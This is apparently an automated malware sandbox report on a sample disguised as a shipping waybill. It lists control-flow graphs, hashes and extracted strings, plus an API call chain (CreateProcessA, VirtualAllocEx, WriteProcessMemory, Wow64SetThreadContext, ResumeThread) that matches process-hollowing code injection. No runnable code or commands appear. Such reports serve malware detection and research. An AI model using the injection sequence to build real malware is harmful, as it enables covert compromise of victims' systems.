49681 7c87570 49680->49681 49741 7c8549c 49681->49741 49745 7c854a0 49681->49745 49682 7c874d6 49682->49631 49686 7c87408 49685->49686 49688 7c861a8 CreateProcessA 49686->49688 49689 7c8619d CreateProcessA 49686->49689 49687 7c874ab 49687->49631 49688->49687 49689->49687 49749 7c85a58 49690->49749 49753 7c85a60 49690->49753 49691 7c878d9 49695 7c875a1 49694->49695 49757 7c85b18 49695->49757 49761 7c85b20 49695->49761 49696 7c87c6f 49700 7c87973 49699->49700 49702 7c85b18 WriteProcessMemory 49700->49702 49703 7c85b20 WriteProcessMemory 49700->49703 49701 7c879ee 49702->49701 49703->49701 49706 7c85b18 WriteProcessMemory 49704->49706 49707 7c85b20 WriteProcessMemory 49704->49707 49705 7c87792 49706->49705 49707->49705 49709 7c875d5 49708->49709 49711 7c8549c ResumeThread 49709->49711 49712 7c854a0 ResumeThread 49709->49712 49710 7c874d6 49710->49631 49711->49710 49712->49710 49765 7c88288 49713->49765 49770 7c88278 49713->49770 49714 7c87507 49714->49631 49716 7c8549c ResumeThread 49714->49716 49717 7c854a0 ResumeThread 49714->49717 49715 7c874d6 49715->49631 49716->49715 49717->49715 49783 7c85c09 49720->49783 49787 7c85c10 49720->49787 49721 7c876cf 49721->49631 49725 7c87972 49724->49725 49727 7c85b18 WriteProcessMemory 49725->49727 49728 7c85b20 WriteProcessMemory 49725->49728 49726 7c879ee 49727->49726 49728->49726 49731 7c8554b Wow64SetThreadContext 49729->49731 49732 7c85550 Wow64SetThreadContext 49729->49732 49730 7c87bc2 49731->49730 49732->49730 49734 7c86231 CreateProcessA 49733->49734 49736 7c863f3 49734->49736 49738 7c86231 CreateProcessA 49737->49738 49740 7c863f3 49738->49740 49742 7c854e0 ResumeThread 49741->49742 49744 7c85511 49742->49744 49744->49682 49746 7c854e0 ResumeThread 49745->49746 49748 7c85511 49746->49748 49748->49682 49750 7c85aa0 VirtualAllocEx 49749->49750 49752 7c85add 49750->49752 49752->49691 49754 7c85aa0 VirtualAllocEx 49753->49754 49756 7c85add 49754->49756 49756->49691 49758 7c85b68 WriteProcessMemory 49757->49758 49760 7c85bbf 49758->49760 49760->49696 49762 7c85b68 WriteProcessMemory 49761->49762 49764 7c85bbf 49762->49764 49764->49696 49766 7c8829d 49765->49766 49775 7c8554b 49766->49775 49779 7c85550 49766->49779 49767 7c882b3 49767->49714 49771 7c8829d 49770->49771 49773 7c8554b Wow64SetThreadContext 49771->49773 49774 7c85550 Wow64SetThreadContext 49771->49774 49772 7c882b3 49772->49714 49773->49772 49774->49772 49776 7c85595 Wow64SetThreadContext 49775->49776 49778 7c855dd 49776->49778 49778->49767 49780 7c85595 Wow64SetThreadContext 49779->49780 49782 7c855dd 49780->49782 49782->49767 49784 7c85c5b ReadProcessMemory 49783->49784 49786 7c85c9f 49784->49786 49786->49721 49788 7c85c5b ReadProcessMemory 49787->49788 49790 7c85c9f 49788->49790 49790->49721

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2673 7c97a20-7c97a43 2674 7c97a4a-7c97ac0 2673->2674 2675 7c97a45 2673->2675 2680 7c97ac3 2674->2680 2675->2674 2681 7c97aca-7c97ae6 2680->2681 2682 7c97ae8 2681->2682 2683 7c97aef-7c97af0 2681->2683 2682->2680 2682->2683 2684 7c97b0c-7c97b4b 2682->2684 2685 7c97c3e-7c97cb0 call 7c98d10 2682->2685 2686 7c97c01-7c97c1d 2682->2686 2687 7c97b50-7c97b54 2682->2687 2688 7c97b80-7c97b92 2682->2688 2689 7c97c22-7c97c39 2682->2689 2690 7c97af5-7c97b0a 2682->2690 2691 7c97b97-7c97bc1 2682->2691 2692 7c97bc6-7c97bfc 2682->2692 2683->2685 2684->2681 2705 7c97cb6-7c97cc0 2685->2705 2686->2681 2693 7c97b67-7c97b6e 2687->2693 2694 7c97b56-7c97b65 2687->2694 2688->2681 2689->2681 2690->2681 2691->2681 2692->2681 2700 7c97b75-7c97b7b 2693->2700 2694->2700 2700->2681
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Tekq$Tekq$)"
                                                • API String ID: 0-573440039
                                                • Opcode ID: e07794ff1b8384d220b0511f0def2cb44eb2c43f6209716905627d9c4f6c02c1
                                                • Instruction ID: f89ebbd5314fab2eaaf8a448c40508c19354f1a720f9b699dd4b9d6763d64ad4
                                                • Opcode Fuzzy Hash: e07794ff1b8384d220b0511f0def2cb44eb2c43f6209716905627d9c4f6c02c1
                                                • Instruction Fuzzy Hash: DB81E4B4E112099FCB44CFAAC985AAEFBB2FF89310F24902AD415AB354DB345905CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2899 7c89c88-7c89caa 2900 7c8a059-7c8a05e 2899->2900 2901 7c89cb0-7c89ceb call 7c89220 call 7c89230 call 7c89240 2899->2901 2903 7c8a068-7c8a07a call 7c88738 2900->2903 2904 7c8a060-7c8a062 2900->2904 2914 7c89ced-7c89cf7 2901->2914 2915 7c89cfe-7c89d1e 2901->2915 2909 7c8a080-7c8a087 2903->2909 2904->2903 2914->2915 2917 7c89d20-7c89d2a 2915->2917 2918 7c89d31-7c89d51 2915->2918 2917->2918 2920 7c89d53-7c89d5d 2918->2920 2921 7c89d64-7c89d84 2918->2921 2920->2921 2923 7c89d86-7c89d90 2921->2923 2924 7c89d97-7c89da0 call 7c89250 2921->2924 2923->2924 2927 7c89da2-7c89dbd call 7c89250 2924->2927 2928 7c89dc4-7c89dcd call 7c89260 2924->2928 2927->2928 2933 7c89dcf-7c89dea call 7c89260 2928->2933 2934 7c89df1-7c89dfa call 7c89270 2928->2934 2933->2934 2940 7c89dfc-7c89e00 call 7c89280 2934->2940 2941 7c89e05-7c89e21 2934->2941 2940->2941 2945 7c89e39-7c89e3d 2941->2945 2946 7c89e23-7c89e29 2941->2946 2947 7c89e3f-7c89e50 call 7c89290 2945->2947 2948 7c89e57-7c89e9f 2945->2948 2949 7c89e2b 2946->2949 2950 7c89e2d-7c89e2f 2946->2950 2947->2948 2956 7c89ea1 2948->2956 2957 7c89ec3-7c89eca 2948->2957 2949->2945 2950->2945 2960 7c89ea4-7c89eaa 2956->2960 2958 7c89ecc-7c89edb 2957->2958 2959 7c89ee1-7c89eef call 7c892a0 2957->2959 2958->2959 2969 7c89ef9-7c89f22 call 7c88738 call 7c892b0 2959->2969 2970 7c89ef1-7c89ef3 2959->2970 2962 7c8a088-7c8a0be 2960->2962 2963 7c89eb0-7c89eb6 2960->2963 2971 7c8a0c0 2962->2971 2972 7c8a0c5-7c8a0ea KiUserExceptionDispatcher 2962->2972 2966 7c89eb8-7c89eba 2963->2966 2967 7c89ec0-7c89ec1 2963->2967 2966->2967 2967->2957 2967->2960 2979 7c89f4f-7c89f6b 2969->2979 2980 7c89f24-7c89f32 2969->2980 2970->2969 2971->2972 2974 7c8a0ec-7c8a0f5 2972->2974 2984 7c89f6d-7c89f77 2979->2984 2985 7c89f7e-7c89fa5 call 7c892c0 2979->2985 2980->2979 2983 7c89f34-7c89f48 2980->2983 2983->2979 2984->2985 2990 7c89fbd-7c89fc1 2985->2990 2991 7c89fa7-7c89fad 2985->2991 2994 7c89fdc-7c89ff8 2990->2994 2995 7c89fc3-7c89fd5 2990->2995 2992 7c89faf 2991->2992 2993 7c89fb1-7c89fb3 2991->2993 2992->2990 2993->2990 2998 7c89ffa-7c8a000 2994->2998 2999 7c8a010-7c8a014 2994->2999 2995->2994 3001 7c8a002 2998->3001 3002 7c8a004-7c8a006 2998->3002 2999->2909 3000 7c8a016-7c8a024 2999->3000 3004 7c8a036-7c8a03a 3000->3004 3005 7c8a026-7c8a034 3000->3005 3001->2999 3002->2999 3007 7c8a040-7c8a058 3004->3007 3005->3004 3005->3007
                                                APIs
                                                • KiUserExceptionDispatcher.NTDLL ref: 07C8A0CF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: DispatcherExceptionUser
                                                • String ID:
                                                • API String ID: 6842923-0
                                                • Opcode ID: ea0bebb1bd5ef7f3aa48f2a4a21af125a8600a1123f1aa3f7f9d6a994fc82c2b
                                                • Instruction ID: e7400bcb2948cdb9d35bfe00d405dcb2469909728932717eb6b7357144efb846
                                                • Opcode Fuzzy Hash: ea0bebb1bd5ef7f3aa48f2a4a21af125a8600a1123f1aa3f7f9d6a994fc82c2b
                                                • Instruction Fuzzy Hash: 4AD1BCB17402058FDB69EBB5C4507AFB7F6AF89708F10846EE14A9B390CB35E901CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tIh
                                                • API String ID: 0-443931868
                                                • Opcode ID: 165e67bb73e0998927c8ae63c78c3e3f6853f697d7df3ce4e9e859f5b322a469
                                                • Instruction ID: 7f0c970379e15d9266e81bf5f2d3cba3efa1e6ce4b4d6053bf8d65f623a2e776
                                                • Opcode Fuzzy Hash: 165e67bb73e0998927c8ae63c78c3e3f6853f697d7df3ce4e9e859f5b322a469
                                                • Instruction Fuzzy Hash: F6D14AB0D1520ADFCB44CF9AD4898AEFBB6FF89300F10D569D415AB254E734AA42CF94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d3668609b58136634be8d5f1ab507300ba00f017c26c75f8244c9c8ce55a59df
                                                • Instruction ID: 9522a5ef380453ea85530fc0d70ecf97e3c4fc3684ff9daf4540bddd82b91410
                                                • Opcode Fuzzy Hash: d3668609b58136634be8d5f1ab507300ba00f017c26c75f8244c9c8ce55a59df
                                                • Instruction Fuzzy Hash: B1524C34A003058FCB14DF68C844B99B7B2FF8A314F2587A9D5596F3A1DB71A986CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c85ccf8f07bff6008651442499ed63212d640383bf8fdf26e24ac09fa97c495c
                                                • Instruction ID: 1be026d9d74d4f7aefb6ab6b3b3529d27ac49f2d3b56326eff79ca765e13c2ea
                                                • Opcode Fuzzy Hash: c85ccf8f07bff6008651442499ed63212d640383bf8fdf26e24ac09fa97c495c
                                                • Instruction Fuzzy Hash: 20524E34A003458FCB14DF68C844B99B7B2FF85314F2587A9D5596F3A2DB71A986CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e16dfbddec289f5439c97268e4b62c734597ce4f131757ab75cb23fd61b2df2
                                                • Instruction ID: 4ca112798e58961c9ced8e8f25ac3659533932df3d048e1a0c827af25ba27055
                                                • Opcode Fuzzy Hash: 8e16dfbddec289f5439c97268e4b62c734597ce4f131757ab75cb23fd61b2df2
                                                • Instruction Fuzzy Hash: 65A18435E1031A8FCB04DFA4D9549EDFBBAFF99300F148619E416AB265EF30A985CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1d466161fb9e20a3924fb86d04ef297b864d1bf949b15a4c87185a4a92f68b4a
                                                • Instruction ID: f78dc54daf21a70b7445bc00cd82904da1f8f646821e947ea62ce7609228a093
                                                • Opcode Fuzzy Hash: 1d466161fb9e20a3924fb86d04ef297b864d1bf949b15a4c87185a4a92f68b4a
                                                • Instruction Fuzzy Hash: 819139B0D15209DFCF58CFA6D58499DFBB2FB8A310F20A42AE416B7264D7349945CF24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 657c4eaf257d3ec57aa86313cf0dae24d5f6e6a4ba60aa73529170067efd6aae
                                                • Instruction ID: f40f92c1ce87a3ac7684570430404de884a30d3500d48a9683febb80a82641ff
                                                • Opcode Fuzzy Hash: 657c4eaf257d3ec57aa86313cf0dae24d5f6e6a4ba60aa73529170067efd6aae
                                                • Instruction Fuzzy Hash: DB918139E1031A9FCB04DFA0D9549DDFBBAFF8A300F148615E416AB264EB30A985CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736936789.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_55a0000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd233b689a3587cf6267a19be50dab9ca35d55cefd9899899473606c71f121ed
                                                • Instruction ID: bf9c80d016ce5787d74b0c85193fd3966f59bd92416c037aea8641ca8d783e53
                                                • Opcode Fuzzy Hash: cd233b689a3587cf6267a19be50dab9ca35d55cefd9899899473606c71f121ed
                                                • Instruction Fuzzy Hash: 14917139E1031A9FCB04DFA0D9549DDFBBAFF89300F158615E416AB264EB30A985CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9e458b6f7157e28d778cbb44fcd640a41eb55a15e69624134311e64f97a67952
                                                • Instruction ID: 3b37f2c7f5d329b04dd2e973ec2bfe982aa6f98c46c97d7d370e0ebd703baf3e
                                                • Opcode Fuzzy Hash: 9e458b6f7157e28d778cbb44fcd640a41eb55a15e69624134311e64f97a67952
                                                • Instruction Fuzzy Hash: E38105B4E14219DFCF54CFAAC8849AEFBB2FB89300F10956AD815B7254D7349942CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72ca1e40ce490b4ac2eabd654eb57f002050ab424cf63a3c0a656b82a4987f6e
                                                • Instruction ID: a1a5ff569d73fa9c4080508d989116d9d7f1a17a8b2400db9413a7246b496891
                                                • Opcode Fuzzy Hash: 72ca1e40ce490b4ac2eabd654eb57f002050ab424cf63a3c0a656b82a4987f6e
                                                • Instruction Fuzzy Hash: C021ECB1E006198BDB58CFABD9452DEFBF7AFC9310F14C07AD509A6254DB701A45CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b3733e48fccf3d00d3c7584067569e649cdbda0685a484a5f08199edad68976
                                                • Instruction ID: a69133768ffd25afbefb854cb4a00b6a6cc592efdecb5dc05bb7f14d5d54e371
                                                • Opcode Fuzzy Hash: 8b3733e48fccf3d00d3c7584067569e649cdbda0685a484a5f08199edad68976
                                                • Instruction Fuzzy Hash: AB21C7B1D016189BEB18DF9BD8457DEFBF6AFC9314F14C06AD408A6264DB740985CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2729 568b814-568b88a call 568a8f8 2735 568b88c-568b88e 2729->2735 2736 568b8f0-568b91c 2729->2736 2737 568b923-568b92b 2735->2737 2738 568b894-568b8a0 2735->2738 2736->2737 2743 568b932-568ba6d 2737->2743 2738->2743 2744 568b8a6-568b8e1 call 568a904 2738->2744 2762 568ba73-568ba81 2743->2762 2754 568b8e6-568b8ef 2744->2754 2763 568ba8a-568bad0 2762->2763 2764 568ba83-568ba89 2762->2764 2769 568badd 2763->2769 2770 568bad2-568bad5 2763->2770 2764->2763 2771 568bade 2769->2771 2770->2769 2771->2771
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hoq$Hoq
                                                • API String ID: 0-3106737575
                                                • Opcode ID: 79af4675b1a7a63e22e2dffe64be27d3ed1677f28183005133717a2dc5d6c7bd
                                                • Instruction ID: 19b99dc58db72ac0dd59412618239d839b7c680e82e05078007c343066100aaf
                                                • Opcode Fuzzy Hash: 79af4675b1a7a63e22e2dffe64be27d3ed1677f28183005133717a2dc5d6c7bd
                                                • Instruction Fuzzy Hash: 40817C70E003199FCB04DFA9C954AAEBBF6FF88300F14816AE409AB365DB749945CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2772 5689bd8-5689bfa 2773 5689bfc-5689c02 2772->2773 2774 5689c03-5689c0d 2772->2774 2776 5689e49-5689e74 call 5688d00 2774->2776 2777 5689c13-5689c2c call 5686d84 * 2 2774->2777 2784 5689e7b-5689ecd call 5688d00 2776->2784 2777->2784 2785 5689c32-5689c54 2777->2785 2794 5689c65-5689c74 2785->2794 2795 5689c56-5689c64 call 5686d94 2785->2795 2801 5689c99-5689cba 2794->2801 2802 5689c76-5689c93 2794->2802 2809 5689d0a-5689d32 2801->2809 2810 5689cbc-5689ccd 2801->2810 2802->2801 2833 5689d35 call 568a128 2809->2833 2834 5689d35 call 568a102 2809->2834 2813 5689cfc-5689d00 2810->2813 2814 5689ccf-5689ce7 call 5686da4 2810->2814 2813->2809 2821 5689ce9-5689cea 2814->2821 2822 5689cec-5689cfa 2814->2822 2817 5689d38-5689d5d 2825 5689d5f-5689d74 2817->2825 2826 5689da3 2817->2826 2821->2822 2822->2813 2822->2814 2825->2826 2828 5689d76-5689d99 2825->2828 2826->2776 2828->2826 2832 5689d9b 2828->2832 2832->2826 2833->2817 2834->2817
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Hoq$Hoq
                                                • API String ID: 0-3106737575
                                                • Opcode ID: b04a6310dec952306b99d00a29156f41e9d255f1cf67daf3cd5de56444eb0bd3
                                                • Instruction ID: 6723dfa662c8692d0420c486631c0aea204832d1668965c9386d5afa6450887e
                                                • Opcode Fuzzy Hash: b04a6310dec952306b99d00a29156f41e9d255f1cf67daf3cd5de56444eb0bd3
                                                • Instruction Fuzzy Hash: 4A715B35B401188FCB15EBA8C5589BEBBF6FF89310B2445A9D401BB7A1CA36ED01CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2835 5684ad0-56869bb 2838 56869bd-56869c1 2835->2838 2839 56869c2-5686a21 2835->2839 2845 5686a2e 2839->2845 2846 5686a23-5686a2c 2839->2846 2847 5686a30-5686a35 2845->2847 2846->2847 2848 5686a7a-5686aaf 2847->2848 2849 5686a37-5686a39 2847->2849 2851 5686ab6-5686b42 2848->2851 2850 5686a3b-5686a3e 2849->2850 2849->2851 2850->2851 2853 5686a40-5686a43 2850->2853 2873 5686b94-5686b96 2851->2873 2874 5686b44-5686b4a 2851->2874 2853->2851 2854 5686a45-5686a48 2853->2854 2854->2851 2856 5686a4a-5686a4e 2854->2856 2858 5686a50-5686a53 2856->2858 2859 5686a55-5686a6a 2856->2859 2858->2859 2861 5686a75-5686a79 2858->2861 2859->2861 2862 5686a6c-5686a70 call 5684aec 2859->2862 2862->2861 2875 5686b4c-5686b54 2874->2875 2876 5686b5f-5686b65 2874->2876 2882 5686b5a call 5686ba8 2875->2882 2883 5686b5a call 5686ba2 2875->2883 2877 5686b7b-5686b81 2876->2877 2878 5686b67-5686b7a 2876->2878 2877->2873 2880 5686b83-5686b8b 2877->2880 2879 5686b5c-5686b5e 2880->2873 2882->2879 2883->2879
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1737042349.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5680000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (oq$Hoq
                                                • API String ID: 0-3084834809
                                                • Opcode ID: 3c0bf3b7f824cb430409e6ba6c2bedc01cab1b1220cf58347600bb25538ec1fe
                                                • Instruction ID: 0524eb09bfdb10d10747cbaa71b0338348277241ece3abd042662d03f59033ed
                                                • Opcode Fuzzy Hash: 3c0bf3b7f824cb430409e6ba6c2bedc01cab1b1220cf58347600bb25538ec1fe
                                                • Instruction Fuzzy Hash: C65124316041119FC715EF68C054ABDBBB6FF94300F2986BAD44A9BB91CE35EC46CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2884 7c9a200-7c9a21e 2885 7c9a220 2884->2885 2886 7c9a225-7c9a22d call 7c9a2f8 2884->2886 2885->2886 2887 7c9a233 2886->2887 2888 7c9a23a-7c9a256 2887->2888 2889 7c9a258 2888->2889 2890 7c9a25f-7c9a260 2888->2890 2889->2887 2889->2890 2891 7c9a2cd-7c9a2d1 2889->2891 2892 7c9a262-7c9a276 2889->2892 2893 7c9a2a6-7c9a2c8 2889->2893 2890->2891 2895 7c9a289-7c9a290 2892->2895 2896 7c9a278-7c9a287 2892->2896 2893->2888 2897 7c9a297-7c9a2a4 2895->2897 2896->2897 2897->2888
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738974147.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c90000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 3H5$3H5
                                                • API String ID: 0-2752242361
                                                • Opcode ID: 6d011182bdae1dfb1eaaa2b3c05cb7d6b6e0c92f7268be4fe827a8883e335c97
                                                • Instruction ID: caaa1669a54ab76996d95bd25d8d47892a292550ad8875d84628bca036a9afca
                                                • Opcode Fuzzy Hash: 6d011182bdae1dfb1eaaa2b3c05cb7d6b6e0c92f7268be4fe827a8883e335c97
                                                • Instruction Fuzzy Hash: 332116B0E10609DFCB88CFAAD544AAEFBF1FF89300F14C5AAD508A7214E7319A45CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3009 7c8619d-7c8623d 3011 7c8623f-7c86249 3009->3011 3012 7c86276-7c86296 3009->3012 3011->3012 3013 7c8624b-7c8624d 3011->3013 3017 7c86298-7c862a2 3012->3017 3018 7c862cf-7c862fe 3012->3018 3015 7c8624f-7c86259 3013->3015 3016 7c86270-7c86273 3013->3016 3019 7c8625b 3015->3019 3020 7c8625d-7c8626c 3015->3020 3016->3012 3017->3018 3022 7c862a4-7c862a6 3017->3022 3026 7c86300-7c8630a 3018->3026 3027 7c86337-7c863f1 CreateProcessA 3018->3027 3019->3020 3020->3020 3021 7c8626e 3020->3021 3021->3016 3023 7c862a8-7c862b2 3022->3023 3024 7c862c9-7c862cc 3022->3024 3028 7c862b4 3023->3028 3029 7c862b6-7c862c5 3023->3029 3024->3018 3026->3027 3030 7c8630c-7c8630e 3026->3030 3040 7c863fa-7c86480 3027->3040 3041 7c863f3-7c863f9 3027->3041 3028->3029 3029->3029 3031 7c862c7 3029->3031 3032 7c86310-7c8631a 3030->3032 3033 7c86331-7c86334 3030->3033 3031->3024 3035 7c8631c 3032->3035 3036 7c8631e-7c8632d 3032->3036 3033->3027 3035->3036 3036->3036 3037 7c8632f 3036->3037 3037->3033 3051 7c86490-7c86494 3040->3051 3052 7c86482-7c86486 3040->3052 3041->3040 3054 7c864a4-7c864a8 3051->3054 3055 7c86496-7c8649a 3051->3055 3052->3051 3053 7c86488 3052->3053 3053->3051 3057 7c864b8-7c864bc 3054->3057 3058 7c864aa-7c864ae 3054->3058 3055->3054 3056 7c8649c 3055->3056 3056->3054 3060 7c864ce-7c864d5 3057->3060 3061 7c864be-7c864c4 3057->3061 3058->3057 3059 7c864b0 3058->3059 3059->3057 3062 7c864ec 3060->3062 3063 7c864d7-7c864e6 3060->3063 3061->3060 3065 7c864ed 3062->3065 3063->3062 3065->3065
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C863DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1738948164.0000000007C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7c80000_Awb# 1294440291; 2 ki_n; G.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 4e9f30d0dd7dfbddc8d344294d184b2b549573d7ea70fb84acf627a7a10828c2
                                                • Instruction ID: a786a3e17a5baabcd54f7cac2fecccab9284ec8207c66e1524ce87aa9acc57c9
                                                • Opcode Fuzzy Hash: 4e9f30d0dd7dfbddc8d344294d184b2b549573d7ea70fb84acf627a7a10828c2
                                                • Instruction Fuzzy Hash: 78A15CB1D0021ADFDF54DFA8C980B9DBBB2BF48314F1481A9E808B7251DB759A85CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
